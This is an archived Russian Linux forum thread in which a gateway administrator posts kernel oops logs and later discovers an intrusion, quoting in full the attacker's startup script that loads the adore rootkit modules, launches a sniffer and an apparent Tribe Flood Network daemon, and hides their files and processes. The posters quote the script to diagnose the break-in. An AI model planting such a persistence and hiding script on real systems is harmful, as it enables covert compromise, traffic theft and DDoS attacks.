LINUX.ORG.RU
ФорумAdmin

Непонятная ситуация. Поработал хакер или внутренняя ошибка?


0

0

Уважаемые знатоки Линукс, здравствуйте! Помогите мне пожалуйста разобраться со сложившейся ситуацией. У меня REDhat 6.2(2.2.14). Gateway,Squid(прокси), firewall(фильтрирующий, FWTK), mail-server(Qmail),WeB(tomcat)- все на нем же. Выход локальных пользователей в интернет через прокси. Долгое время все работало прекрасно, но вот на днях произошло что-то, что приводит к аварийному завершению некоторых сервисов и программ с выдачей на экран и в системный журнал сообщения ядра с выдачей значений регистров и т.д. Причем аварийно может завершиться любая программа с которой я работаю. Вот пример лога. Feb 12 08:35:25 Spider kernel: Unable to handle kernel paging request at virtual address 08058000 Feb 12 08:35:25 Spider kernel: current->tss.cr3 = 0e899000, %cr3 = 0e899000 Feb 12 08:35:25 Spider kernel: *pde = 0e10e067 Feb 12 08:35:25 Spider kernel: *pte = 00000000 Feb 12 08:35:25 Spider kernel: Oops: 0000 Feb 12 08:35:25 Spider kernel: CPU: 0 Feb 12 08:35:25 Spider kernel: EIP: 0010:[] Feb 12 08:35:25 Spider kernel: EFLAGS: 00010246 Feb 12 08:35:25 Spider kernel: eax: 00000000 ebx: ce8d8000 ecx: 00000131 edx: 080584c7 Feb 12 08:35:25 Spider kernel: esi: 08058000 edi: ce8d9af4 ebp: ce8d9fbc esp: ce8d97dc Feb 12 08:35:25 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 08:35:25 Spider kernel: Process consolechars (pid: 1130, process nr: 50, stackpage=ce8d9000) Feb 12 08:35:25 Spider kernel: Stack: 08057cf8 468b0c5e ce8d97ec ce8d97ec 10000436 00000000 00000000 00000000 Feb 12 08:35:25 Spider kernel: 00000000 817e0000 a58181a5 7e818199 38696f6b 000002e9 00000036 000002e1 Feb 12 08:35:25 Spider kernel: 7273752f 62696c2f 64626b2f 6e6f632f 656c6f73 746e6f66 6f6b2f73 382d3869 Feb 12 08:35:25 Spider kernel: Call Trace: [system_call+52/56] Feb 12 08:35:25 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 12 08:36:40 Spider kernel: Unable to handle kernel paging request at virtual address 0804c000 Feb 12 08:36:40 Spider kernel: current->tss.cr3 = 0ea69000, %cr3 = 0ea69000 Feb 12 08:36:40 Spider kernel: *pde = 0ea68067 Feb 12 08:36:40 Spider kernel: *pte = 00000000 Feb 12 08:36:40 Spider kernel: Oops: 0000 Feb 12 08:36:40 Spider kernel: CPU: 0 Feb 12 08:36:40 Spider kernel: EIP: 0010:[] Feb 12 08:36:40 Spider kernel: EFLAGS: 00010246 Feb 12 08:36:40 Spider kernel: eax: 00000000 ebx: cea6a000 ecx: 0000014b edx: 0804c52f Feb 12 08:36:40 Spider kernel: esi: 0804c000 edi: cea6ba8c ebp: cea6bfbc esp: cea6b7dc Feb 12 08:36:40 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 08:36:40 Spider kernel: Process qmail-popup (pid: 1132, process nr: 52, stackpage=cea6b000) Feb 12 08:36:40 Spider kernel: Stack: 00000001 245c3b66 cea6b7ec cea6b7ec 204b4f2b 3331313c 38392e32 36353931 Feb 12 08:36:40 Spider kernel: 40303032 616c7574 6d6f7270 6b6e6162 3e75722e 00000a0d 00000000 00000000 Feb 12 08:36:40 Spider kernel: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 08:36:40 Spider kernel: Call Trace: [system_call+52/56] Feb 12 08:36:40 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 12 08:38:19 Spider kernel: Unable to handle kernel paging request at virtual address 0804c000 Feb 12 08:38:19 Spider kernel: current->tss.cr3 = 0c8eb000, %cr3 = 0c8eb000 Feb 12 08:38:19 Spider kernel: *pde = 0c71d067 Feb 12 08:38:19 Spider kernel: *pte = 00000000 Feb 12 08:38:19 Spider kernel: Oops: 0000 Feb 12 08:38:19 Spider kernel: CPU: 0 Feb 12 08:38:19 Spider kernel: EIP: 0010:[] Feb 12 08:38:19 Spider kernel: EFLAGS: 00010246 Feb 12 08:38:19 Spider kernel: eax: 00000000 ebx: cc71e000 ecx: 00000103 edx: 0804c40f Feb 12 08:38:19 Spider kernel: esi: 0804c000 edi: cc71fbac ebp: cc71ffbc esp: cc71f7dc Feb 12 08:38:19 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 08:38:19 Spider kernel: Process supervise (pid: 634, process nr: 33, stackpage=cc71f000) Feb 12 08:38:19 Spider kernel: Stack: bffffc37 00000000 cc71f7ec cc71f7ec 00000040 fe75873a 58736209 00000000 Feb 12 08:38:19 Spider kernel: 00000282 00640001 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 08:38:19 Spider kernel: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 08:38:19 Spider kernel: Call Trace: [system_call+52/56] Feb 12 08:38:19 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 12 10:15:37 Spider kernel: Unable to handle kernel paging request at virtual address 085ae000 Feb 12 10:15:37 Spider kernel: current->tss.cr3 = 02b9b000, %cr3 = 02b9b000 Feb 12 10:15:37 Spider kernel: *pde = 0e2fb067 Feb 12 10:15:37 Spider kernel: *pte = 00000000 Feb 12 10:15:37 Spider kernel: Oops: 0000 Feb 12 10:15:37 Spider kernel: CPU: 0 Feb 12 10:15:37 Spider kernel: EIP: 0010:[] Feb 12 10:15:37 Spider kernel: EFLAGS: 00010246 Feb 12 10:15:37 Spider kernel: eax: 00000000 ebx: cc076000 ecx: 000001c7 edx: 085ae71f Feb 12 10:15:37 Spider kernel: esi: 085ae000 edi: cc07789c ebp: cc077fbc esp: cc0777dc Feb 12 10:15:37 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 10:15:37 Spider kernel: Process squid (pid: 592, process nr: 20, stackpage=cc077000) Feb 12 10:15:37 Spider kernel: Stack: 085adf50 000f485c cc0777ec cc0777ec 00006e03 00100300 0f4f0000 e6fd907e Feb 12 10:15:37 Spider kernel: 61dc378a aa490f65 18058ba6 96000000 993a878d 013a878d 19000000 003a878e Feb 12 10:15:37 Spider kernel: 01000000 04046000 00000031 70747468 772f2f3a 692e7777 2e746278 2f6d6f63 Feb 12 10:15:37 Spider kernel: Call Trace: [system_call+52/56] Feb 12 10:15:37 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 12 10:15:40 Spider squid[589]: Squid Parent: child process 2269 started Feb 12 11:59:40 Spider kernel: Unable to handle kernel paging request at virtual address 0804c000 Feb 12 11:59:40 Spider kernel: current->tss.cr3 = 0d9bc000, %cr3 = 0d9bc000 Feb 12 11:59:40 Spider kernel: *pde = 0d86d067 Feb 12 11:59:40 Spider kernel: *pte = 00000000 Feb 12 11:59:40 Spider kernel: Oops: 0000 Feb 12 11:59:40 Spider kernel: CPU: 0 Feb 12 11:59:40 Spider kernel: EIP: 0010:[] Feb 12 11:59:40 Spider kernel: EFLAGS: 00010246 Feb 12 11:59:40 Spider kernel: eax: 00000000 ebx: c1f9c000 ecx: 00000103 edx: 0804c40f Feb 12 11:59:40 Spider kernel: esi: 0804c000 edi: c1f9dbac ebp: c1f9dfbc esp: c1f9d7dc Feb 12 11:59:40 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 11:59:40 Spider kernel: Process supervise (pid: 3854, process nr: 24, stackpage=c1f9d000) Feb 12 11:59:40 Spider kernel: Stack: bffff8f4 20202020 c1f9d7ec c1f9d7ec 00000040 fca5873a 58b2070c 00000000 Feb 12 11:59:40 Spider kernel: 00000f15 00750001 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 11:59:40 Spider kernel: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 11:59:40 Spider kernel: Call Trace: [system_call+52/56] Feb 12 11:59:40 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 12 11:59:41 Spider kernel: Unable to handle kernel paging request at virtual address 08052000 Feb 12 11:59:41 Spider kernel: current->tss.cr3 = 0eb4b000, %cr3 = 0eb4b000 Feb 12 11:59:41 Spider kernel: *pde = 0c8ca067 Feb 12 11:59:41 Spider kernel: *pte = 00000000 Feb 12 11:59:41 Spider kernel: Oops: 0000 Feb 12 11:59:41 Spider kernel: CPU: 0 Feb 12 11:59:41 Spider kernel: EIP: 0010:[] Feb 12 11:59:41 Spider kernel: EFLAGS: 00010246 Feb 12 11:59:41 Spider kernel: eax: 00000000 ebx: c1030000 ecx: 0000000b edx: 0805202f Feb 12 11:59:41 Spider kernel: esi: 08052000 edi: c1031f8c ebp: c1031fbc esp: c10317dc Feb 12 11:59:41 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 11:59:41 Spider kernel: Process tcpserver (pid: 3861, process nr: 68, stackpage=c1031000) Feb 12 11:59:41 Spider kernel: Stack: 00000002 00000000 c10317ec c10317ec 73706374 65767265 73203a72 75746174 Feb 12 11:59:41 Spider kernel: 30203a73 0a30342f 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 11:59:41 Spider kernel: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 11:59:41 Spider kernel: Call Trace: [system_call+52/56] Feb 12 11:59:41 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 12 12:00:34 Spider kernel: Unable to handle kernel paging request at virtual address 0804c000 Feb 12 12:00:34 Spider kernel: current->tss.cr3 = 01fa6000, %cr3 = 01fa6000 Feb 12 12:00:34 Spider kernel: *pde = 03e17067 Feb 12 12:00:34 Spider kernel: *pte = 00000000 Feb 12 12:00:34 Spider kernel: Oops: 0000 Feb 12 12:00:34 Spider kernel: CPU: 0 Feb 12 12:00:34 Spider kernel: EIP: 0010:[] Feb 12 12:00:34 Spider kernel: EFLAGS: 00010246 Feb 12 12:00:34 Spider kernel: eax: 00000000 ebx: ccb0e000 ecx: 0000014b edx: 0804c52f Feb 12 12:00:34 Spider kernel: esi: 0804c000 edi: ccb0fa8c ebp: ccb0ffbc esp: ccb0f7dc Feb 12 12:00:34 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 12:00:34 Spider kernel: Process qmail-popup (pid: 3898, process nr: 64, stackpage=ccb0f000) Feb 12 12:00:34 Spider kernel: Stack: 00000001 732f6c69 ccb0f7ec ccb0f7ec 204b4f2b 3938333c 38392e38 38363931 Feb 12 12:00:34 Spider kernel: 40343334 616c7574 6d6f7270 6b6e6162 3e75722e 00000a0d 00000000 00000000 Feb 12 12:00:34 Spider kernel: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 12:00:34 Spider kernel: Call Trace: [system_call+52/56] Feb 12 12:00:34 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 12 15:00:28 Spider kernel: Unable to handle kernel paging request at virtual address 08067000 Feb 12 15:00:28 Spider kernel: current->tss.cr3 = 0ac6e000, %cr3 = 0ac6e000 Feb 12 15:00:28 Spider kernel: *pde = 07b87067 Feb 12 15:00:28 Spider kernel: *pte = 00000000 Feb 12 15:00:28 Spider kernel: Oops: 0000 Feb 12 15:00:28 Spider kernel: CPU: 0 Feb 12 15:00:28 Spider kernel: EIP: 0010:[] Feb 12 15:00:28 Spider kernel: EFLAGS: 00010246 Feb 12 15:00:28 Spider kernel: eax: 00000000 ebx: c451c000 ecx: 00000033 edx: 080670cf Feb 12 15:00:28 Spider kernel: esi: 08067000 edi: c451deec ebp: c451dfbc esp: c451d7dc Feb 12 15:00:28 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 12 15:00:28 Spider kernel: Process cpp (pid: 8377, process nr: 32, stackpage=c451d000) Feb 12 15:00:28 Spider kernel: Stack: 00000001 429e96a6 c451d7ec c451d7ec 20312023 72726522 632e6f6e 0a200a22 Feb 12 15:00:28 Spider kernel: 0a0a0a0a 746e690a 72726520 0a3b6f6e 00000000 00000000 00000000 00000000 Feb 12 15:00:28 Spider kernel: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Feb 12 15:00:28 Spider kernel: Call Trace: [system_call+52/56] Feb 12 15:00:28 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Feb 14 08:27:22 Spider kernel: Unable to handle kernel paging request at virtual address 0811d000 Feb 14 08:27:22 Spider kernel: current->tss.cr3 = 0caa2000, %cr3 = 0caa2000 Feb 14 08:27:22 Spider kernel: *pde = 0d657067 Feb 14 08:27:22 Spider kernel: *pte = 00000000 Feb 14 08:27:22 Spider kernel: Oops: 0000 Feb 14 08:27:22 Spider kernel: CPU: 0 Feb 14 08:27:22 Spider kernel: EIP: 0010:[] Feb 14 08:27:22 Spider kernel: EFLAGS: 00010246 Feb 14 08:27:22 Spider kernel: eax: 00000000 ebx: ce20a000 ecx: 00000141 edx: 0811d507 Feb 14 08:27:22 Spider kernel: esi: 0811d000 edi: ce20bab4 ebp: ce20bfbc esp: ce20b7dc Feb 14 08:27:22 Spider kernel: ds: 0018 es: 0018 ss: 0018 Feb 14 08:27:22 Spider kernel: Process mc (pid: 1990, process nr: 48, stackpage=ce20b000) Feb 14 08:27:22 Spider kernel: Stack: 08100c04 00000000 ce20b7ec ce20b7ec 7261762f 40149d00 00000010 00000011 Feb 14 08:27:22 Spider kernel: 7261762f 00000000 00000000 000002b1 6d6f682f 74732f65 76676f72 0000002f Feb 14 08:27:22 Spider kernel: 00000000 00000299 00000000 00000000 00000000 00000000 00000000 00000000 Feb 14 08:27:22 Spider kernel: Call Trace: [system_call+52/56] Feb 14 08:27:22 Spider kernel: Code: f3 a5 66 a5 a4 8d b3 ba 01 00 00 bf ba 9b 0d d0 fc ac ae 75 Может кто поможет расшифровать эти логи и понять мне - это что, результат проникновения извне или мой внутренний трабл. Если возможно прошу ответить мне на мой e-mail Vstroganova@mail.ru. Буду благодарна за любую помощь. Вера Строганова, Тула

anonymous

Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

больше похоже на глюк железа
компьютер перегружали ?

возможно память или проц

ae ()

Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

а вот еще заметил

там oops-ы идут
/usr/src/kernel/Document/oop-* ?
но скорей всего железо

ae ()

Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

Компьютер перегружали.Загрузила с минимумом процессов и без иксов. Результат тот же. Память у меня 256мб,ее тоже меняли и даже увеличивали до 384мб. Пробовала пересобрать ядро(для теста)и тоже сваливается по той же ошибке на make bzImage. Может еще какие мысли есть.

anonymous ()

Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

А если просто дать make? А вообще-то скорее всего память или проц глючат- короче в железе проблема- ставлю десять баксов против одного на железо:-))) Может быть блок питания поджарили немножко. Удачи!

e2e4 ()

Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

попробуйте проц поменять !

ae ()

Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

Сообщение всем особенно начинающим админам, как я. Немного ситуация прояснилась, но несовсем. Это было внешнее вторжение, только еще не поняла как это произошло. В каталоге /tmp появился каталог h1dd3n, в этом каталоге следующие файлы - ssh.pid, ssh_random_seed, dout,dserv,ssh_host_key. В rc.3,rc.5 - исполняемый скрипт без линка S99. Вот он #!/bin/bash /sbin/insmod -f adore > /dev/null /sbin/insmod -f cleaner > /dev/null /sbin/rmmod cleaner > /dev/null /usr/sbin/ncsd NCSDPID=$(ps ax | grep ncsd | grep -v grep | awk '{ print $1; }') /usr/bin/agt i $NCSDPID > /dev/null /usr/sbin/tfnd TFNDPID=$(ps ax | grep tfnd | grep -v grep | awk '{ print $1; }') /usr/bin/agt i $TFNDPID > /dev/null /usr/sbin/dsnd -w /tmp/h1dd3n/dout -f /tmp/h1dd3n/dserv -i eth0 & DSNDPID=$(ps ax | grep dsnd | grep -v grep | awk '{ print $1; }') /usr/bin/agt i $DSNDPID > /dev/null /usr/bin/agt h /tmp/h1dd3n/dserv > /dev/null /usr/bin/agt h /tmp/h1dd3n/dout > /dev/null /usr/bin/agt h /tmp/h1dd3n/ssh_host_key > /dev/null /usr/bin/agt h /tmp/h1dd3n/ssh_pid > /dev/null /usr/bin/agt h /tmp/h1dd3n/ssh_random_seed > /dev/null exit И бинарники в каталогах - из скрипта видно где. Собирался трафик и помещался в файл dout. Не нашла только модуля, adore. Теперь нужно понять через какую дырку он залез и когда.

anonymous ()

Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

через ssh!!! у тебя ssh1 стоит?

anonymous ()

Re: Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

Да, установлен, но демон то sshd я не запускаю, т. е. процесс неактивный. Правда порт 22 был не закрыт. И я видела, что 12300 был открыт. Я думала, что если на этом порту не висит процесс, то не страшно, что он открыт. Хотя, какое-то время у меня был запущен sshd. Если нетрудно, уважаемый незнакомец, поясни, как это он сделал. Спасибо

anonymous ()

Re: Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

Да установлен, но я им не пользуюсь и сервис был неактивен. Правда какое-то время он был активен, но это было недели две назад, а потом я его отключила. Если нетрудно, то поясните поподробнее, как он это сделал.

anonymous ()

Re: Re: Непонятная ситуация. Поработал хакер или внутренняя ошибка?

Да установлен, но я им не пользуюсь и сервис был неактивен. Правда какое-то время он был активен, но это было недели две назад, а потом я его отключила. Если нетрудно, то поясните поподробнее, как он это сделал.

anonymous ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.